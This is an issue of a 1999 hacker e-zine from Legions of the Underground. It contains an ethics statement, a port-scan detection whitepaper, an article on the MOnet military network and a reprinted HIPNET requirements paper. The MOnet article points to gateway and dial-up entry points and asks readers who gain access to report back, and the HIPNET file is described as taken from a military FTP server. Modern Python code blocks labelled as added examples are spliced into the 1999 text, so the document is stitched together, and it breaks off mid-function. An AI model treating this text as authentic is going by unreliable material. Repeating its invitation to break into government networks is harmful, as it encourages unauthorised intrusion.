/* Keen Veracity...................................Volume 3, Issue 8 */

Keen Veracity Technical Journal
July 21st, 1999
Legions of the Underground
[most of the editing done by headflux]

.-[ Keen Veracity, Volume 3, Issue 8 ]
|
|__Introduction
|  |_ kv[1]; General Information..................................staff
|  |_ kv[2]; Statement........................................optiklenz
|
|__Computer Security
|  |_ kv[3]; Port Scan Detection..............................t0ucht0ne
|  |_ kv[4]; Introduction to MoNet...............................uplink
|  |_ kv[5]; Article on HIPNET..................................zipcode
|  |_ kv[6]; Intrusion Detection Systems......................ProtocolD
|  |_ kv[7]; Another IE Exploit?.................................ntwak0
|
|__Programs/Source Code
|  |_ kv[8]; tryseg.c.........................................guidob
|  |_ kv[9]; match.c...........................................icesk
|  |_ kv[10]; netsniff.c (reprint)...........................mnemonic
|  |_ kv[11]; liberty.c........................................guidob
|
|__Miscellaneous
|  |_ kv[12]; Ode to JP....................................krankshaft
|  |_ kv[13]; Top WWW Sites...................................ntwak0
|
|__Telephony/Radio
|  |_ kv[14]; Intro to Loops.....................................hitman
|
|_ kv[i]; outro

kv[1]; /* General Information..................................staff */

SYSCON IS BACK AND IN EFFECT: http://www.legions.org/syscon for info

[posse]:
  cap'n'crunch, optiklenz, aphex, guidob, [havoc], touchtone, chiXy,
  lothos, slfdstrct, ntwak0, headflux, ProtocolD, kingbong, Kanuchsa,
  Digital Ebola, duncan, silver

[lou]
www.legions.org
efnet - #legions
come hang with grouppiez, and other cracked out porno stars
- legions ircd still being tweak'd

[shoutouts]: no one in particular

[copyLeft]: whatever...

Download Pictures of Legions at Defcon7 from the following sites:
===============================================================
***| http://defcon.legions.org
***| http://www.legions.org/defcon7/index.html

ef-te-pee
================
***| ftp://www.underzine.com/rootfest/defcon/defcon7.html

----------------------------------------
call the authorities optik's drunk again
----------------------------------------

gimme shouts next issue for being a p1mp.
sure word.
joe gotta hand cuff yur hoes doh
nice zine, btw.
so they dont be mewvin when i try to humpzorize em
thnks articles with real substance. makes b4b0 look like dr. seuss.

-------------------------------------------------------------
it's just a matter of taste... Some people obviously have it.
-------------------------------------------------------------

kv[2]; /* Statement........................................optiklenz */

Something needs to be said...

First off... Earlier this year an assembly of organizations decided to release a joint statement "condemning" Legions. This evidently was before any of them contacted Legions requesting information on what the true plight was. Because of some iniquitous media coverage a few people misunderstood our motives. This of course is in regards to the past "China Human Rights incident". We wanted to bring a tragic predicament to surface so other people could speak out as well. The media was misinformed when they reported about our goals to aid these countries in their fight for freedom of speech. They (the media) stated we (Legions) wanted to damage certain computer networks in other parts of the world.
We wanted to help them with the situation concerning their lack of freedom and human rights; why would we want to destroy or damage their networks, the same networks that give them what little freedom they have to communicate as people? That just makes no sense at all. I ask that the people who joined to make the statement condemning Legions take that into consideration and next time contact us so that we could discuss things and clear up misunderstandings. It's not a funny matter when people's lives and reputations are at stake.

As hackers, the computer has built our lives, and in turn we have built our lives around the computer; we would never choose to harm such a valuable resource. The term hacker doesn't discriminate. You can be a federal agent, but the best damn coder in the world, and in the sense of the word you'll be a hacker. Bill Gates, a hacker turned billionaire. Software designers, security specialists, the people who help protect your networks: these people are hackers.

"Information, and data is to be cherished, (for it can only build you not hurt you) cultivated and developed not to be annulled or locked up. Hacking is an expansive applied knowledge in any technical field. Destruction, and the unschooled acts of those who live without morals are what separates the "hackers" (those whose main purpose in life is to learn, expand, and apply what they learn) from those that go as far as turning the computer on." (The previous quoted statement was excerpted from Keen Veracity 3, www.underzine.com.)

Something serious is going on at the moment. A string of "attacks" against our own government. And till now no one has said anything. The actions of these groups are sincerely half-witted and absurd, for in the end they will accomplish nothing except a few more long-term jail sentences. The current actions of these self-proclaimed "hackers" have me infuriated.

The people DoS'ing government sites, defacing .mil and .gov domains, and damaging information aren't hackers; they are nothing more than unschooled adolescent teens with nothing better on their hands. They are an endangerment to the true aspect of computer science dealt with by the hacker community. Call what they are doing what you want, but don't call it "hacking", because it's not. So many articles have surfaced which referred to what these cracker cults are doing as "hacking", e.g. "Hackers attack government", "Hackers strike again" (false). Call them destructive, call them by their first name, but for the sake of god don't just yank out the term "hackers" for a better story; for the sake of god don't defile the name "hacker" for your personal gain. A hacker lives by a strong code of ethics. We wouldn't be issuing this statement if we didn't.

A government investigation is currently pending on the above matters. If we don't do something about this now the government will surely hold us accountable, and I'm not talking jail time. We have a lot to lose if we don't stop these people from making us look bad. Though we are not affiliated with them directly, certain mainstream media has left a misleading trail. Some of our rights as computer partisans may be at stake here. With that said, I ask that all sites that archive these senseless hacks suspend documenting these fatuous acts for the time being. The script kiddies that go out and target government and military servers are media crazy, and you are only adding fuel to their fire by flashing their work to the public.

A note to the lamers: This is where it ENDS... In the end it's what you choose to do that makes you who you are. So make sure what you choose to do doesn't make you look like an ass.
http://www.hackernews.com/archive/1999/noaa/index.html
http://www.hackernews.com/archive/1999/army/index.html
http://www.hackernews.com/archive/1999/monmouth/index.html
http://www.hackernews.com/archive/1999/argonne/index.html
http://www.hackernews.com/archive/1999/nswcl/index.html
http://www.hackernews.com/archive/1999/senate2/index.html
http://www.hackernews.com/archive/1999/bnl/index.html
http://www.hackernews.com/archive/1999/doi/index.html

The above is an archive of recent government and military site defacements, done by what seems comparable to the works of 5-year-olds... Look at the archived sites and tell me something doesn't need to be done. Just letting people know we aren't going for their childish actions. We don't advocate any of the trash being done by these uninspired idiots.

we're "hackers", the other white meat!

------------------001----------------------------------------------
the below is an email, and response excerpted from Keen Veracity 4
-------------------------------------------------------------------

[mail]
Do you still hack?

[response]
Well it depends on your analogue of hacking. By the authentic formalization I "hack" every day. Whether I'm coding or doing network checks, it's still hacking. Hacking has little to do with the "illegal" entry of computer systems apart from the technical and systematic aspect of it. Illegally accessing a system for no intended reason is not something I advocate or advise performing. What I suggest achieving is going out, and learning, and questioning the system itself before trying to exploit it. And even once you feel you have a broad knowledge of the system, make sure you use what you know to build things, and not fuck things up. System admins who are affected by crackers turn to hackers in order to secure their systems. They turn to the philosophies, documents, and programs written by "hackers"... Let's not make them look the other way. We are here, and we are skilled.
What your brain dead system administrator can do in a week we can accomplish in a matter of minutes, more practically. That's the message that should be put across. One of positivity, not one that says "We're going to take you down."

Read my introduction in Keen Veracity 3; I go into greater detail on the subject at hand.
http://www.t00ned.org/optik/kv/kv3.txt

-Steve Stakton (optiklenz)
-Head Security Advisor for NACC

Legions Of the Underground - Our title name is not meant to seem dark. Don't get the misconception that we are some sort of cult or only wear black. The computer Underground is a symbol, something that is important, and we treasure its existence, so in its honor we use the name Legions Of the Underground. We are just a bunch of computer enthusiasts who enjoy working together. Nothing more, nothing less.

kv[3]; /* Port Scan Detection..............................t0ucht0ne */

Port scanning. Everyone does it. Whether it's an administrator trying to find out what is being spoken on a remote node, or a 15-year-old script kid looking for exploitable boxes, port scanning is the first step in identifying services on a networked machine. I've always been bewildered when I've had conversations with network security experts and semi-aware administrators who explain to me that they've invested a lot of money and resources into the latest firewall technologies and intrusion detection software, yet never even considered port scan detection tripwires. Being aware of port scans can alert any competent sysadmin to potential compromise long before it's too late. With the wealth of software out there dedicated to finding everything from open NetBIOS shares to web server exploitation, port scan detection software becomes more important than ever. Furthermore, it's safe to say that making your boxes layer 3 aware is a good idea. Even a wayward ICMP Echo can be the first sign of a lurking intruder.

In this whitepaper, I'd like to talk about several packages that encompass making your network "probe" aware. I will talk about the pros and cons of automated defenses employed by these packages, plus give a general overview of why it's a good idea to also be layer 3 aware.

The first important thing to recognize is that port-scanning software has made some significant advances in the last year or so.
Scanners have become stealthier, faster, and smarter. For example, two years ago most people were using Strobe, written by Julian Assange (ftp://suburbia.net:/pub/strobe.tgz). It was quick and dirty (possibly still the fastest port scanning software to date), and would spit out the services spoken at the other end. Now most people are using NMAP, written by Fyodor (http://www.insecure.org/nmap), which not only does port scanning, but will also do TCP fingerprinting, compare the fingerprint to its database, and guess what O/S is at the other end. It's capable of a myriad of different scans, including a stealth scan that can beat a lot of port scan detection software. So, with one little piece of software, a potential cracker can identify the services being spoken on your networked host and what operating system is being run, and do it undetected. Scared? You should be. In many respects, it's pointless to remove operating-system-specific banners from your daemons, because software like NMAP and Queso do a great job of identifying the O/S through TCP fingerprinting. Unfortunately, a lot of admins and network engineers aren't even familiar with these programs, but those that are realize how important it is to be at least semi-aware of when these tools are being used against them.

"So, T0uchT0ne, what can we do about this?" I hear you asking. I'm glad you asked, because we are now going to discuss several options that are available.

My personal favorite is Abacus Sentry (http://www.psionic.com/tools/portsentry-0.90.tar.gz). It's a piece of software written by Craig Rowland as part of the Abacus Security Project. Sentry has the ability to detect port scans and implement automated defenses. These defenses can encompass everything from entering the offending machine into your routing table (routing the host into oblivion) to adding the attacker to the hosts.deny file.
Even more exciting is the ability to add custom commands to the Sentry configuration file that would allow you to be paged or emailed in the event of a port scan trigger.

To understand what happens with port scan detection software, we need to cover some basic concepts of how a TCP connection is established. Host A sends a TCP segment to Host B with the SYN bit set to 1 and the ACK bit set to 0. This makes sense, since the first step in a connection is to syn"chronize" Host A and Host B. Host B then responds with a TCP segment (notice that I'm not using the term packet, because to TCP there is no such thing as a packet; don't make this mistake) that has the SYN bit set to 1 and the ACK bit set to 1. After the initial handshake, both hosts send the TCP stream with the SYN and ACK bits set to 1 right up until the teardown of the connection. This is a very simple explanation. Suffice to say, I've not gone into how sequencing works, etc., because this is not a whitepaper on TCP but on port scan detection.

Most port scanners work on this simple principle of opening TCP connections to a host and seeing what answers on the other side. The secret to port scan detection is making sure you have something listening on ports that don't normally have daemons installed. Since we know FTP is usually on port 21, and there is already an FTP daemon installed on port 21, we can't bind a sentry device on it, since no two daemons can listen on the same port. Fortunately, the good news is that port scan detection can be implemented through the basic understanding that most intruders are scanning a range of ports from 1-1024 (and higher) in a sequential manner. Since we can't bind to 21, let's bind to 22, 23, 24, 25, etc. (excluding ports with listening daemons). If a connection is made to port 22, and we don't have a service on port 22 (which we do, but it's our sentry software), then we know there is a good chance that a port scan is being run.
Of course, you don't want to trigger your defenses based on one unused port. That is why Abacus Sentry allows you to set the "trigger". For example, on my hosts I usually set a trigger of 2, so that it takes 3 consecutive ports with no services on them to be hit before you get entered into my hosts.deny file or routed to nowhere.

I hear you calling foul. "Yes, but I could spoof my source address to be your upstream router, and the next thing you know, your machine is cut off from the Internet." True. You could. This is one of the downsides of port scan detection software: it can be used against you to deny your service. This shouldn't stop you from using it. Here is why. First off, with Sentry there is a file called "hosts.ignore" that allows you to configure the detection software to never take action on specific hosts. I've gotten into the habit of tracerouting out of my network to different hosts and recording which routers within the upstream I usually go through. I enter these routers' IP addresses into my hosts.ignore file. This isn't foolproof, but for the most part does a lot more good than bad. For the record, in the 2 years I've used Abacus Sentry on a myriad of different networks, I've never been the victim of a DoS attack where Sentry was used against me. My opinion (and this is also the opinion of the author of Abacus Sentry) is that the benefits of using port scan detection software far outweigh the cons.

I also believe in using JAIL (Just Another IP Logger), which you can find at www.genocide2600.com/~tattooman using their search engine. Logging ICMP traffic is the mark of a good security admin. Sure, you don't need to log all ICMP traffic, but logging echoes and destination unreachables is a sure way of catching the first steps in an attack. Granted, most echoes and other ICMP traffic is legit, but when you see a ping from some host in Germany, and you know you don't have any customers or users in Germany, something could be up.
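The trigger and hosts.ignore logic just described, as an added example (not PortSentry's own code) run over a constructed connection log: the threshold counts distinct sentry ports per source, the ignore list covers the upstream routers recorded with traceroute, and the hosts.deny and blackhole-route responses are rendered as strings rather than executed. The log format, addresses and set of real service ports are all assumptions.

```python
"""Port-scan trigger logic modelled on the Sentry behaviour described above.

Added example, not PortSentry's code. The sentry "owns" every port in 1-1024
that has no real daemon; each connection attempt to such a port is a hit. A
source is acted on once it has hit more distinct sentry ports than the
trigger (trigger=2 means the third hit fires), unless it is on hosts.ignore,
which is what protects your upstream routers from a spoofed-source DoS.
"""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional, Set, Tuple

# Ports with real daemons on this host (assumed); the sentry can never bind these.
REAL_SERVICES: Set[int] = {21, 25, 80}
# Everything else in the range a sequential scanner walks is sentry territory.
SENTRY_PORTS: Set[int] = set(range(1, 1025)) - REAL_SERVICES
# hosts.ignore: upstream routers recorded from traceroute (constructed values).
HOSTS_IGNORE = [ip_network("192.0.2.1/32"), ip_network("198.51.100.0/24")]

# Constructed connection log: "<syslog timestamp> <source ip> -> port <n>"
LOG_LINES = """\
Jul 21 01:02:03 203.0.113.5 -> port 22
Jul 21 01:02:03 203.0.113.5 -> port 23
Jul 21 01:02:04 203.0.113.5 -> port 24
Jul 21 01:02:04 203.0.113.5 -> port 26
Jul 21 01:03:10 192.0.2.1 -> port 22
Jul 21 01:03:10 192.0.2.1 -> port 23
Jul 21 01:03:11 192.0.2.1 -> port 24
Jul 21 01:05:00 203.0.113.200 -> port 80
Jul 21 01:05:00 203.0.113.200 -> port 21
Jul 21 01:06:00 203.0.113.77 -> port 22
Jul 21 01:06:00 203.0.113.77 -> port 22
Jul 21 01:06:01 203.0.113.77 -> port 23
this line is not a connection record
"""

LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}) -> port (?P<port>\d{1,5})$"
)


def parse_line(line: str) -> Optional[Tuple[str, int]]:
    """Return (source_ip, port) for a connection record, None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return m.group("src"), int(m.group("port"))


class ScanSentry:
    def __init__(self, trigger: int = 2, ignore=HOSTS_IGNORE) -> None:
        self.trigger = trigger
        self.ignore = list(ignore)
        self.hits: Dict[str, Set[int]] = defaultdict(set)  # src -> sentry ports touched
        self.actions: List[Dict[str, object]] = []         # one entry per blocked source

    def is_ignored(self, src: str) -> bool:
        addr = ip_address(src)
        return any(addr in net for net in self.ignore)

    @property
    def blocked(self) -> List[str]:
        return [str(a["src"]) for a in self.actions]

    def observe(self, src: str, port: int) -> bool:
        """Record one connection attempt; return True if it fired the trigger."""
        if port not in SENTRY_PORTS:      # a real daemon answered, not the sentry
            return False
        if self.is_ignored(src) or src in self.blocked:
            return False
        self.hits[src].add(port)
        if len(self.hits[src]) <= self.trigger:
            return False
        # Render (do not execute) the two responses the article describes.
        self.actions.append({
            "src": src,
            "port": port,
            "hosts_deny": f"ALL: {src}",
            "route": f"route add -host {src} reject",
        })
        return True


def run_sentry(lines, trigger: int = 2) -> ScanSentry:
    """Feed log lines through a sentry; unparseable lines are skipped."""
    sentry = ScanSentry(trigger=trigger)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            sentry.observe(*rec)
    return sentry


if __name__ == "__main__":
    for a in run_sentry(LOG_LINES.splitlines()).actions:
        print(f"{a['src']} tripped the sentry on port {a['port']}: {a['hosts_deny']}")
```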
Configuring your syslog daemon properly, and logging all your scan detection software to one file, can allow you to write some pretty snazzy perl scripts to boot. I'll leave this to your imagination.

If you have any questions, or want to offer me some good advice on past experiences you've had with detection software, email me at root@t0ucht0ne.ca. I'd love to hear from you.

Shout Outs: All of Legions of the Underground and #legions, Drown, Mopar, most of #hacking, Stratus (wherever you are), Kweiheri (you will be owned by Kwei), NodeRaTz, and The White Niger (pronounced Ni-Jer).

* T0uchT0ne #

[-------------------------------------]

kv[4]; /* Introduction to MoNet...............................uplink */

Information compiled and written by lowtek aka uplink of Legions Of the Underground
http://www.legions.org

Introduction

MOnet (Multi-wavelength Optical Networking Technology) is about the most advanced network that is in progress at the moment besides SOnet. It combines all of the government/military applications. MOnet is connected to many military domains. Many Bell RBOCs and private telecom companies are working on the project together, such as:

AT&T
Bell Atlantic
BellCore
BellSouth
Lucent Technologies
Pacific Telesis
SBC/TRI
NSA
DARPA

MOnet is being put into progress in Washington D.C. and is a 100 million dollar project from good old .mil (don't you just love where your taxes are going?). It is funded by ARPA (Advanced Research Projects Agency). MOnet is basically SOnet but it has been improved. The way it was improved is that it signals data through wavelengths of light. This way of transporting data is very fast and very efficient.
The MOnet in Washington is interconnecting Bell Atlantic's Silver Spring Laboratory, the Naval Research Laboratory, and the National Security Agency. This network is being expanded all the time to group together other such government groupings. The New Jersey MOnet at the moment is interconnecting the Red Bank of New Jersey and is currently being tested at a transmission speed of 2.5 Gbit/s.

Impact

Assessing Multi-wavelength Optical Networking (MONET) for commercial viability and Government applications
Balanced approach with focus on economics & architectures, enabling technology, and networking testbeds
Demonstrating networking through experimental interconnected networking testbeds (in NJ and DC)
Strong team representing equipment manufacturers, management software developers, and network operators
Technology transfer through commercialization by partners

This shows MOnet's actual gates and connections:

[Diagram: the MOnet core with a single GateWay, connected to NSA, DARPA, NASA, DISA, DIA and NRL]

This shows MOnet at its last stage complete, which includes DIA, NRL, DISA, NASA, and DARPA. These are all very important military operating groups that provide the power of MOnet. And what's this GateWay? Huh? Oh, so there is an actual way into the system. Yes there is, but to get into MOnet is to be able to pretty much hack anything. This system does not only use high DES encryption but also uses hardware encryption (just like SIPRNET). These gateways supposedly can be accessed through dial-ups in Washington D.C. and New Jersey, also through a domain that is hosted by MOnet.
[Diagram: a computer logging on either via the Internet or via a dial-up connection; both paths pass through a GateWay / modem pool, are bundled together, and transfer straight into MOnet]

This is a security threat, that it can be accessed over the web, because if you do this you may enter MOnet without having to deal with the encryption. Now only some .mil domains, and only some .gov also. If you reach these or get access any other way please e-mail me so I can update this text at lowtek@uswestmail.net.

MOnet will continue to grow within the United States and start to progress to other businesses. This network is still in its starting stage but is finally becoming up to date a bit. I could not find any other info on this subject (considering the fact that they want to keep it secret).

[-------------------------------------]

kv[5]; /* HIPNET............................................zipc0de */

I found this file on a military ftp server, which I thought was very interesting, so I saved it along with other documents. As it turns out it's on the HIPNET, which is a military network used by our government. If you have some more information on the HIPNET please e-mail me at zipc0de@hotmail.com and I'll include it in my further text files on military/government networks. As for now enjoy the file and don't get into trouble :]

HIPNET User Requirements
Revision 4.0

1. Introduction

The High Performance Network (HIPNET) seeks to develop a reliable multicast transport protocol and IP QoS mechanisms which satisfy requirements of US Navy and French MOD applications. The applications are multimedia in nature and include: bulk file transfer, image transfer, audio/video, email/messaging, interactive planning missions (whiteboarding) and simulations, realtime data transfer, teleconferencing and others. The requirements that these applications impose on the transport protocol and the IP QoS facilities are examined in this paper.

The general requirement is a reliable multicast service, yet there are many variations of this service. There are two highly variable aspects to a reliable multicast service: reliability, which spans a spectrum from best effort to absolute, and ordering, which might mean anything from simple source delivery to causal or total ordering. Several existing protocols provide reliable multicast service, yet none has achieved the status of open standardization acceptance. One overriding requirement of the US Navy user community is the requirement that the reliable multicast service be provided by a protocol that is accepted as an open standard, much as TCP and IP are in today's Internet.

This paper is a culmination of a three-stage process. The first is to define a chart of communication characteristics that can be used to distinguish applications relative to their requirements (section 3). The second is to define a list of generic applications that encompass the totality of all envisioned applications and then to apply the characteristics chart to each of them (section 4).

2. The Operational Environment: Communication Channels

Consideration must be given to the characteristics of the communication channel over which the data will be transmitted.
The communication channel characteristics for the US Navy and French MOD vary widely, depending on the operational environment, and range from low data rate, simplex channels to high capacity ATM channels. Part of the channel characteristics could include asymmetrical networks where the data channel transfer rate between sender and receiver is different from the rate between receiver and sender. This would provide a communication environment that is vastly different from the normal communication channel characteristics, which could include Ethernet, FDDI or ATM. Therefore, each application must be able to specify those critical characteristics that the communication channel must support in order for the application to be able to meet the mission requirements. The project, however, must focus on a subset of this entire range in order to live within budget and time constraints; therefore, the operational environment identified for HIPNET is ATM and IP over ATM.

3. Communication Characteristics

The user application can only meet its mission requirements if the underlying communication architecture provides the mechanisms to either define or control a specific characteristic that is needed to meet the specific requirements of the user application. Some of these mechanisms could be located within the user application itself, the underlying transport service or as part of the network interface. There are tradeoffs in determining the optimum location for each of these mechanisms since each location may have significant performance or user compatibility requirements. Specific characteristics are outlined in the following paragraphs.

As part of the user application's requirements, the user may wish to send data to either one receiver or multiple receivers. Depending upon how this mechanism is implemented, this could be accomplished using one protocol architecture that provides both capabilities or two separate protocol architectures.

3.1 Group Management

The key issue in group management is: does the application need to identify the receiver group, i.e. have group knowledge? The knowledge could be total, partial or none. If the knowledge is total, then the group is said to be known. If the knowledge is partial, then the group is said to be partly-known. If no knowledge of the group is required, the group is unknown.

Multicast groups could consist of fixed or dynamic memberships. The management of the groups could take place external to the transport protocol and in some cases be manually performed. Any protocol running over IPv6 has the IGMP (Internet Group Management Protocol) available that provides network level functions for joining/leaving/routing of groups. IGMP is sufficient in many cases, but if the application needs any control over the membership, or monitoring of the membership, such capability must be performed above IGMP. The size of the multicast group, the method of either joining or leaving the group, and the responsibility for maintaining the configuration of the group are characteristics that could be different between specific user applications that would still use a common reliable multicast protocol. An additional requirement could include the ability to support multicast receivers who may temporarily leave the multicast group but want to stay current with data that was transmitted while they were not part of the multicast group.

Applications define a group management policy that may allow dynamic joins; may limit admission to a multicast association to a subset of the participating nodes; or may not allow any nodes outside of a fixed membership to join. The join/leave policy is also affected by the reliability constraints; for example, an application may require atomicity: the ability to deliver within a specified interval, once it's delivered to one of the group, to all members of the group.
Since the policy of group membership is so application dependent, it makes sense to not implement group policy in the protocol stack, however, this does not relieve the protocol stack of responsibility to provide necessary group management funcitonality for application use. An event like a node joining or leaving a multicast group may or may not require notification depending on the reliability constraints and security policies. The notification may be required by a central controlling node ( a server or master side) or it may be required by the rest of the group. The policy will be established by the application, however, the tranport layer may be required to have mechanisms necessary to effect such events. 3.2 Topology Applications differ in their requirements for data flow direction. Some applications (e.g. broadcast TV) involve a single transmitter and a group of receivers. This arrangement is referred to as point-to-multipoint (PT->MP) communications. Another arrangement is to allow the receivers to transmit back to the sender (MP->PT) (sometimes referred to as concast), but not to each other. Yet another is the topological configuration in video teleconference which is multipoint-to-multipoint (MP<-->MP). 3.3 Scalability Scalability makes the mechanisms necessary to implement a reliable multicast and an IP QoS an issue. Multicast's most basic benefit (that the number of transmissions is reduced from the unicast case) may be negated if acknowledgements are required from all receivers. There are schemes for minimizing the amount of control packets from receivers to transmitters and for limiting the number of retransmissions, however, the basic dilemma remains. One scheme is to have the receivers send a negative acknowledgement (an explicit request for retransmission) instead of positively acknowledging each packet, however, the NAK algorithm may also degrade under implosion given a sufficiently large receiver set. 
There are schemes for limiting NAKs as well as ACKs, and often hybrids are proposed. A tree-structured set of proxy receivers, where the proxies assume responsibility for reliable delivery, is one such scheme.

Some applications negate the scalability issue if the number of participants is guaranteed to be small. An example would be email multicast on an organizational basis where the number of organizational units is small (say less than 15). Another example is a video conference in an N x N configuration (all participants are both sender and receiver), which might not consist of more than 15 people. On the other hand, applications that execute in small-scale groups today may need to accommodate large groups tomorrow because of the explosive growth of the Internet and its associated applications and unforeseen uses of those applications. Put another way: it is difficult to predict future uses of technology based on past experiences. The Internet itself, for example, was created primarily to service file transfers and remote logins. Only after the technology was created and utilized did researchers realize that its main use would be the exchange of email (and, subsequently, access to the World Wide Web).

3.4 Data Ordering

The delivery of data from the multicast sender to the multicast receiver may require that the delivery service support a range of ordering including none, source, causal, or total ordering. Source ordering is the ordering that a unicast transport protocol like TCP would provide, delivering messages between a pair of participating endpoints in the order that they were transmitted. Causal ordering guarantees that all messages that are related are ordered, such that a receiver would not receive a particular message if all related messages had not previously been delivered. Total ordering means that multiple streams from multiple senders are delivered to each receiver in the same relative order.
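The source and causal orderings just defined, as an added example that is not part of the document: a small Python model of a multicast participant that delivers either in per-sender (source) order or in causal order. It uses vector clocks, the usual mechanism behind causal multicast delivery (the document only says the transport must supply a timestamp of some sort); the Node and Msg classes and the three-node question/answer scenario are constructed for illustration.

```python
"""Source (per-sender FIFO) vs. causal ordering of multicast delivery,
modelled with vector clocks.  Added example, not from the document."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Msg:
    sender: int           # index of the sending node
    vc: Tuple[int, ...]   # sender's vector clock at send time
    payload: str


class Node:
    """One multicast participant.  vc[k] counts the messages from node k
    that this node has delivered; a sent message carries that vector."""

    def __init__(self, pid: int, n: int, causal: bool = True):
        self.pid = pid
        self.vc = [0] * n
        self.causal = causal
        self.pending: List[Msg] = []      # received but not yet deliverable
        self.delivered: List[str] = []

    def send(self, payload: str) -> Msg:
        self.vc[self.pid] += 1
        return Msg(self.pid, tuple(self.vc), payload)

    def _deliverable(self, m: Msg) -> bool:
        # Source ordering: m must be the next message expected from its sender.
        if m.vc[m.sender] != self.vc[m.sender] + 1:
            return False
        if not self.causal:
            return True
        # Causal ordering additionally requires that everything the sender
        # had delivered before sending m has already been delivered here.
        return all(m.vc[k] <= self.vc[k]
                   for k in range(len(self.vc)) if k != m.sender)

    def receive(self, m: Msg) -> List[str]:
        """Accept one message from the network; return the payloads that
        became deliverable (held-back messages are retried each time)."""
        self.pending.append(m)
        out: List[str] = []
        progressed = True
        while progressed:
            progressed = False
            for cand in list(self.pending):
                if self._deliverable(cand):
                    self.pending.remove(cand)
                    self.vc[cand.sender] = cand.vc[cand.sender]
                    self.delivered.append(cand.payload)
                    out.append(cand.payload)
                    progressed = True
        return out


def run(causal: bool) -> List[str]:
    """Three nodes (constructed scenario).  Node 0 multicasts a question;
    node 1 delivers it and multicasts an answer; the network hands node 2
    the answer before the question.  Returns node 2's delivery order."""
    n = 3
    n0, n1, n2 = Node(0, n, causal), Node(1, n, causal), Node(2, n, causal)
    q = n0.send("question")
    n1.receive(q)             # node 1 delivers q, so its clock now covers it
    a = n1.send("answer")     # a therefore causally depends on q
    n2.receive(a)             # reordered in transit: reply arrives first
    n2.receive(q)
    return n2.delivered


if __name__ == "__main__":
    print("source order :", run(False))   # answer before question
    print("causal order :", run(True))    # question, then answer
```

Source ordering alone lets node 2 deliver the answer before the question it refers to, because the two messages come from different senders; the causal check holds the answer back until the question has been delivered, which is exactly the guarantee the section describes.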
There are often requirements in distributed processing for variations on these ordering properties for the purpose of attaining consistency, fault tolerance, and stability. The support of total or causal ordering typically requires the transport protocol to provide a timestamp of some sort.

3.5 Reliability Range

As stated earlier, the user application may require anything in a range from an absolute guarantee that all receivers have received the data to the best-effort reliability provided by the transmission characteristics of the communication channel. Absolute reliability requires acknowledgements for all data packets transmitted and implies total knowledge of the receiver set. There are partial reliability requirements imposed by some applications, such as a k-reliability mode wherein data transmission is successful if k receivers acknowledge the message. Some applications may impose the requirement that a majority of receivers acknowledging receipt is sufficient. Another aspect of reliability is that of atomicity: if the message is delivered to any member of the receiver set then it must be delivered to all members of the set. This could be the case, for example, in a distributed database application where consistency is an important requirement. Data may require a reliability mode of most-recent (or freshness) that requires reliability but only within a latency bound (a lifetime is associated with the data).

The method of assuring reliability must be balanced against other requirements placed by the user on the communication channel. This may become a negotiated function between the user application and the underlying communication channel. In addition, the definition of reliability may have to be established by either the user application as a multicast sender or the user application as a multicast receiver.
3.6 Quality of Service (QoS)

A QoS capability might make use of a resource reservation mechanism which permeates the communication protocol layers such that a certain level of performance is guaranteed. QoS parameters include latency, throughput, jitter, precedence, reliability and capacity. Applications that don't require QoS are satisfied with only best-effort delivery services. The characteristics required by the user application of the communication channel may be defined as individual items, or they could make up a single QoS requirement that is passed from the user application to the underlying communication channel architecture. A standard format may be required so that each user application is not required to develop its own format for defining specific characteristics for the communication channel.

3.6.1 Communication Channel Throughput

The user application may require that the communication channel support a required transmission rate, or throughput, from a sender to either a single or multiple receivers. The throughput rate might be expressed as a burst rate and/or a sustained rate. The rate reflects the application's ability to inject traffic into the network. The acceptable rate might vary depending on the available resources; for example, a video conference over a T1 circuit might specify its requirement as a 128 Kbps service, whereas the same conference over an ATM circuit might require 1 Mbps service. This reflects the fact that the user's perception of a required QoS might change relative to his knowledge of the resources available. The ability of the communication channel to support a specific transmission rate may require negotiation between the user application and the underlying communication channel.

3.6.2 Communication Channel Latency

The user application may require that data transmitted by the sender be received by either a single receiver or multiple receivers within a specific delay.
The latency could be expressed on a per-session or per-message basis. The application can indicate the minimum delay that will be noticeable to the application. This provides information to the negotiation process, which can then determine when to cease the negotiation for the requested latency. The distance from sender to receiver will strongly influence achievable delay; thus, the application may need to negotiate the delay parameter depending on the communication path available.

3.6.3 Communication Channel Jitter

Jitter is the variation in the end-to-end delay caused principally by media access delays and queueing delays. Jitter can be compensated for by adding a variable delay at the receiver. Jitter is a concern for streams (like audio and video) that require synchronization. Jitter is also an indication of the amount of congestion in the net and may provide important feedback to the QoS mechanisms.

3.6.4 Precedence/Priority

Applications often need to expedite delivery of certain messages. This could be on a per-session basis or on a per-message basis. Some applications need to define the importance of their data according to a system-wide scheme. If the network media supports priorities and the operating system is capable of real-time performance, end-to-end delays can be bounded.

3.6.5 Reliability

Forward error correction (FEC) techniques are used to guard against errors by including with the data transmissions redundant data bits which can be used by the receiver to detect, and, in some cases, correct, certain bit errors. FEC provides reliability at the expense of channel bandwidth and transit delay, but is helpful when applications cannot tolerate retransmissions. The error characteristics of the communication channel determine the degree of redundancy required. Noisier channels require more redundancy. The QoS parameter of reliability, therefore, is communication channel dependent.
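FEC as described in 3.6.5, as an added example that is not from the document: a block of k data packets is sent with one XOR parity packet, the simplest erasure code. It makes the trade-off the section states concrete (the parity costs 1/k extra bandwidth and lets the receiver repair one lost packet per block with no retransmission) and shows the failure mode when losses exceed the redundancy. Packet contents and function names are constructed.

```python
"""Single-erasure forward error correction with an XOR parity packet.
Added example; not part of the original document."""
from typing import Dict, List, Optional


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encode_block(packets: List[bytes]) -> List[bytes]:
    """Return the k data packets followed by one parity packet (the XOR of
    all of them).  Redundancy is 1/k of the block: a larger k costs less
    bandwidth but tolerates only one loss per k+1 packets."""
    size = len(packets[0])
    if any(len(p) != size for p in packets):
        raise ValueError("all packets in a block must have equal length")
    parity = bytes(size)
    for p in packets:
        parity = _xor(parity, p)
    return list(packets) + [parity]


def recover_block(received: Dict[int, bytes], k: int) -> Optional[List[bytes]]:
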